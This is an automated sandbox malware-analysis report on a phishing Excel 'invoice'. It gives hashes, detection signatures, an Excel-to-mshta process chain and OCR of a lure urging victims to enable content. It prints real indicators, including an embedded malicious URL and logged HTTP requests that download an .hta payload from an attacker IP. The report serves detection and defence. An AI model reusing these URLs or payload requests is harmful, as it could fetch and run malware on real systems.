Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Invoice#T5O2025.xls

Overview

General Information

Sample name:Invoice#T5O2025.xls
Analysis ID:1592495
MD5:672c67954a3bfbd5cd55c71d59d5b6cf
SHA1:2568553e9931dea57a5d27239b406319a8ca1c6a
SHA256:11cef9a224722a7d5726188155d3c6ccd2a206a49ce9121e338a843617856b75
Tags:xlsuser-abuse_ch
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Sigma detected: Suspicious Microsoft Office Child Process
Detected non-DNS traffic on DNS port
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

  • System is w11x64_office
  • EXCEL.EXE (PID: 2568 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
    • mshta.exe (PID: 1696 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 36D15DDE6D71802D9588CC0D48EDF8EA)
    • splwow64.exe (PID: 5500 cmdline: C:\Windows\splwow64.exe 12288 MD5: AF4A7EBF6114EE9E6FBCC910EC3C96E6)
  • EXCEL.EXE (PID: 5272 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Invoice#T5O2025.xls" MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 2568, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 1696, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 14.103.79.10, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 2568, Protocol: tcp, SourceIp: 192.168.2.25, SourceIsIpv6: false, SourcePort: 59104
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.25, DestinationIsIpv6: false, DestinationPort: 59104, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 2568, Protocol: tcp, SourceIp: 14.103.79.10, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Invoice#T5O2025.xlsAvira: detected
Source: Invoice#T5O2025.xlsVirustotal: Detection: 24%Perma Link
Source: Invoice#T5O2025.xlsReversingLabs: Detection: 39%
Source: Invoice#T5O2025.xlsJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.25:59106 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficDNS query: name: s.deemos.com
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.25:59106 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.25:59105 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.25:59106 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.25:59106 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.25:59106 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.25:59106 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.25:59106 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.25:59106 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.25:59106 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.25:59106 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.25:59106 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.25:59094 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.25:59094
Source: global trafficTCP traffic: 192.168.2.25:59094 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.25:59094 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.25:59094
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.25:59094
Source: global trafficTCP traffic: 192.168.2.25:59094 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.25:59094
Source: global trafficTCP traffic: 192.168.2.25:59094 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.25:59104
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.25:59104
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.25:59104
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.25:59104
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.25:59104
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.25:59104
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.25:59104
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.25:59104
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.25:59104
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.25:59104
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.25:59104 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.25:59104
Source: global trafficTCP traffic: 192.168.2.25:59105 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 192.168.2.25:59105 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.25:59105 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 192.168.2.25:59105 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.25:59105 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 192.168.2.25:59105 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 192.168.2.25:59105 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 192.168.2.25:59105 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 192.168.2.25:59105 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.25:59105 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 192.168.2.25:59105 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.25:59105 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.25:59105 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 192.168.2.25:59105 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 192.168.2.25:59105 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.25:59105 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 192.168.2.25:59105 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.25:59105 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.25:59105
Source: global trafficTCP traffic: 192.168.2.25:59105 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.25:59105 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.25:59105 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.25:59106 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.25:59106
Source: global trafficTCP traffic: 192.168.2.25:59106 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.25:59106 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.25:59106
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.25:59106
Source: global trafficTCP traffic: 192.168.2.25:59106 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.25:59106 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.25:59106
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.25:59106
Source: global trafficTCP traffic: 192.168.2.25:59106 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.25:59106
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.25:59106
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.25:59106
Source: global trafficTCP traffic: 192.168.2.25:59106 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.25:59106 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.25:59106 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.25:59106
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.25:59106
Source: global trafficTCP traffic: 192.168.2.25:59094 -> 1.1.1.1:53
Source: Joe Sandbox ViewIP Address: 14.103.79.10 14.103.79.10
Source: Joe Sandbox ViewIP Address: 13.107.246.45 13.107.246.45
Source: Joe Sandbox ViewJA3 fingerprint: 258a5a1e95b8a911872bae9081526644
Source: global trafficHTTP traffic detected: GET /fNsCo8xA?&priesthood=tame&quotation=pretty&mall HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/ssw/reallynicegirlwithniceattitudegirlfriends.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /fNsCo8xA?&priesthood=tame&quotation=pretty&mall HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /rules/rule170146v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /xampp/ssw/reallynicegirlwithniceattitudegirlfriends.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.119.74
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: global trafficDNS traffic detected: DNS query: s.deemos.com
Source: Primary1737012689599449100_210767C1-3E24-428B-BCC8-050E97B5C782.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.40/flatfontassets.pkg
Source: Invoice#T5O2025.xls, FC530000.0.drString found in binary or memory: https://s.deemos.com/fNsCo8xA?&priesthood=tame&quotation=pretty&mall
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59106
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59104
Source: unknownNetwork traffic detected: HTTP traffic on port 59104 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59106 -> 443
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.25:59106 version: TLS 1.2

System Summary

barindex
Source: screenshotOCR: document is protected Open the document in If this document was @ltva1bZ protected documents @bi#d%
Source: screenshotOCR: protected documents @bi#d%: @ the yellow bar above Once you have enabled editing please click Ena
Source: screenshotOCR: Enable Content" from the yellow bar above 27 1: Above price is based on EXT China, not included any
Source: screenshotOCR: document is protected Open the document in If this document was @ltva1bZ protected documents @bi#d%
Source: screenshotOCR: protected documents @bi#d%: @ the yellow bar above Once you have enabled editing please click Ena
Source: screenshotOCR: Enable Content" from the yellow bar above 27 1: Above price is based on EXT China, not included any
Source: screenshotOCR: document is protected Open the document in If this document was @ltva1bZ protected documents @bi#d%
Source: screenshotOCR: protected documents @bi#d%: @ the yellow bar above Once you have enabled editing please click Ena
Source: screenshotOCR: Enable Content" from the yellow bar above 27 1: Above price is based on EXT China, not included any
Source: screenshotOCR: document is protected Tanks inspection ended Initial calculation started Initial calculation ended C
Source: screenshotOCR: document is protected Tanks inspection ended Initial calculation started Initial calculation ended C
Source: screenshotOCR: document is protected If this document was the yellow bar above Once you have enabled 3 ting. please
Source: screenshotOCR: Enable Content- from the yellow bar above 12/7/224 12/7/224 12/7/ 224 12/7/224 12/7/224 13
Source: Invoice#T5O2025.xlsOLE: Microsoft Excel 2007+
Source: Invoice#T5O2025.xlsOLE: Microsoft Excel 2007+
Source: Invoice#T5O2025.xlsOLE: Microsoft Excel 2007+
Source: FC530000.0.drOLE: Microsoft Excel 2007+
Source: FC530000.0.drOLE: Microsoft Excel 2007+
Source: Invoice#T5O2025.xlsOLE indicator, VBA macros: true
Source: Invoice#T5O2025.xlsStream path 'MBD0081AAFB/\x1Ole' : https://s.deemos.com/fNsCo8xA?&priesthood=tame&quotation=pretty&mall]~kc pX+}i!:n.Z3BdFffT8GSpS8RvFfW5cPG1Ccb4GfFsCwjHyGTE41L2mFP1Gu5aXB4ZfKpZzluRDeq7m1A3lMsc7vnNs2R7E0RxCOhSsPMCEOSm4UYI38PrD36kTtlrpPfZip3EpuuI4UcLg2CDtSYXxFHiCL0jeXQZypuutAGmIWR9fb33rWbwatoqsZLkT9x8PYFqPiiaC6wFAodpHg6dkdlTLlpa8l7EKQ3sArzdpFNlzz6QLRcUxJf52PeDxw.shLsljH7Q&1EcJ
Source: FC530000.0.drStream path 'MBD0081AAFB/\x1Ole' : https://s.deemos.com/fNsCo8xA?&priesthood=tame&quotation=pretty&mall]~kc pX+}i!:n.Z3BdFffT8GSpS8RvFfW5cPG1Ccb4GfFsCwjHyGTE41L2mFP1Gu5aXB4ZfKpZzluRDeq7m1A3lMsc7vnNs2R7E0RxCOhSsPMCEOSm4UYI38PrD36kTtlrpPfZip3EpuuI4UcLg2CDtSYXxFHiCL0jeXQZypuutAGmIWR9fb33rWbwatoqsZLkT9x8PYFqPiiaC6wFAodpHg6dkdlTLlpa8l7EKQ3sArzdpFNlzz6QLRcUxJf52PeDxw.shLsljH7Q&1EcJ
Source: ~DFE5A7427820C20C99.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal80.expl.winXLS@6/14@3/3
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\FC530000Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{210767C1-3E24-428B-BCC8-050E97B5C782} - OProcSessId.datJump to behavior
Source: Invoice#T5O2025.xlsOLE indicator, Workbook stream: true
Source: FC530000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Invoice#T5O2025.xlsVirustotal: Detection: 24%
Source: Invoice#T5O2025.xlsReversingLabs: Detection: 39%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Invoice#T5O2025.xls"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: c2r64.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEAutomated click: OK
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: Invoice#T5O2025.xlsStatic file information: File size 1275904 > 1048576
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: ~DFE5A7427820C20C99.TMP.0.drInitial sample: OLE indicators vbamacros = False
Source: Invoice#T5O2025.xlsInitial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
